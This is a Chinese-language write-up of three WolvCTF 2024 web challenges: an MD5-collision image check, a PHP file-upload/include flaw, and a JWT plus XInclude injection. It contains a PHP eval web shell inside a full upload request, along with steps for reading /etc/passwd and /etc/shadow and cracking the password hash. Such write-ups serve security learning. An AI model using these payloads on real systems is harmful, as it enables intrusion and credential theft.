WolvCTF2024-复盘

Bean Cafe

他的验证逻辑是通过图片的md5的值来验证的，所以我们只需要传两张MD5相同的图片就可以获得flag

https://drive.google.com/drive/folders/1eCcMtQkHTreAJT6JmwxG10x1HbT6prY0

Upload Fun

<?php
    if($_SERVER['REQUEST_METHOD'] == "POST"){
        if ($_FILES["f"]["size"] > 1000) {
            echo "file too large";
            return;
        }

        if (str_contains($_FILES["f"]["name"], "..")) {
            echo "no .. in filename please";
            return;
        }

        if (empty($_FILES["f"])){
            echo "empty file";
            return;
        }

        $ip = $_SERVER['REMOTE_ADDR'];
        $flag = file_get_contents("/flag.txt");
        $hash = hash('sha256', $flag . $ip);

        if (move_uploaded_file($_FILES["f"]["tmp_name"], "./uploads/" . $hash . "_" . $_FILES["f"]["name"])) {
            echo "upload success";
        } else {
            echo "upload error";
        }
    } else {
        if (isset($_GET["f"])) {
            $path = "./uploads/" . $_GET["f"];
            if (str_contains($path, "..")) {
                echo "no .. in f please";
                return;
            }
            include $path;
        }

        highlight_file("index.php");
    }
?>

首先分析一下源码，源码通过POST方式来上传文件并且上传的文件不能包含..用GET的方式来读取文件也不能带有..，上传的文件在uploads目录下，但是我们不知道$hash是什么。

通过谷歌得知在linux种文件名的长度最大可为255个字符，我们可以通过这种方式让它报错来得知他的值

我们可以看到他的回显告诉我们了hash的值，然后我们再上传一句话木马访问即可。

POST上传文件的请求体模板:

POST / HTTP/2
Host: 
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://0ad900b10331bc6f843fbff300b80018.web-security-academy.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylZktl8pLMuKyOfBy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 198

------WebKitFormBoundarylZktl8pLMuKyOfBy
Content-Disposition: form-data; name=""; filename=""
Content-Type: 


<?php eval($_POST['1'])?>
------WebKitFormBoundarylZktl8pLMuKyOfBy

Username

题目提示了jwt可以爆破，那这道题肯定和jwt伪造有关。

用jwt-cracker爆破密钥，为mstzt

因为有标签，所以判断为xxe注入，但是正常的xxe他会有过滤，不能引用东西。可以使用XInclude attack关于XInclude attack

读取/app/app.py文件

import flask
from flask import Flask, render_template, request, url_for
import jwt
from lxml import etree
import os
import re
import tempfile

app = Flask(__name__)

FLAG = os.environ.get('FLAG') or 'wcft{fake-flag}'
FLAGUSER_PASSWORD = os.environ.get('FLAGUSER_PASSWORD') or 'fake-password'

JWT_SECRET = os.environ.get('JWT_SECRET') or 'secret'

JWT_ALG = 'HS256'
JWT_COOKIE = 'appdata'


@app.route('/')
def root():
    return render_template("index.html")


@app.route('/secret-welcome-935734', methods=['GET'])
def secret_welcome():
    # There is a linux user named 'flaguser'
    # Login here with that username and their linux password.
    auth = request.authorization

    if auth is None or auth.username != 'flaguser' or auth.password != FLAGUSER_PASSWORD:
        resp = flask.Response('Please provide the right credentials to get the flag')
        resp.headers['WWW-Authenticate'] = 'Basic'
        return resp, 401

    return f'Congrats, here is your flag: {FLAG}'


@app.route('/welcome', methods=['GET'])
def welcome():
    cookie = request.cookies.get(JWT_COOKIE)

    if not cookie:
        return f'Error: missing {JWT_COOKIE} cookie value'

    try:
        jwtData = jwt.decode(cookie, JWT_SECRET, algorithms=[JWT_ALG])
    except:
        return 'Error: unable to decode JWT cookie', 400

    data = jwtData['data']
    if not data:
        return 'Error: missing data field from decoded JWT', 400

    xmlText = str(data)
    if '&' in xmlText:
        return 'Error: No entity references please', 400
    if '%' in xmlText:
        return 'Error: No parameter file entities please', 400

    tmp = tempfile.NamedTemporaryFile()

    # Open the file for writing.
    with open(tmp.name, 'w') as f:
        f.write(xmlText)

    try:
        parser = etree.XMLParser(resolve_entities=False)
        xmlDoc = etree.parse(tmp.name, parser=parser)
        xmlDoc.xinclude()
    except Exception as e:
        print('XML Error:', e)
        return 'Error: Error parsing XML', 400


    usernameElement = xmlDoc.find('username')
    if usernameElement is None:
        return 'Error: Missing username element in XML', 400

    username = usernameElement.text

    return render_template("welcome.html", username=username)


@app.route('/register', methods=['POST'])
def register():
    username = request.form.get('username')

    if not username:
        return 'Error: username is required', 400

    username = str(username)

    if not re.match('^[a-z] $', username):
        return 'Error: username must be only lowercase letters', 400

    if len(username) < 3:
        return 'Error: username must be at least 3 letters', 400

    if len(username) > 20:
        return 'Error: username must be no longer than 20 letters', 400

    # Useful for chal development
    # username = '<xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="/app/app.py" parse="text"/>'
    xml = f'<data><username>{username}</username></data>'

    jwtData = {"data": xml}

    cookie = jwt.encode(jwtData, JWT_SECRET, algorithm=JWT_ALG)

    response = flask.make_response(f'hello {username}')
    response.set_cookie(JWT_COOKIE, cookie)

    response.headers['location'] = url_for('welcome')
    return response, 302

if __name__ == "__main__":
    app.run(debug=False)

在这个文件里可以得知，有一个新的路由/secret-welcome-935734在这里登陆成功后得到flag，用户名为flaguser，密码我们可以用xxe读取/etc/passwd或者/etc/shadow在shadow中我们得知密码为$1$hack$BzqsFHqkPjQ2Sn9amFsgN0这个可以利用hashcat爆破

关于hashcat的用法

爆破出来密码是qqz3登录得到flag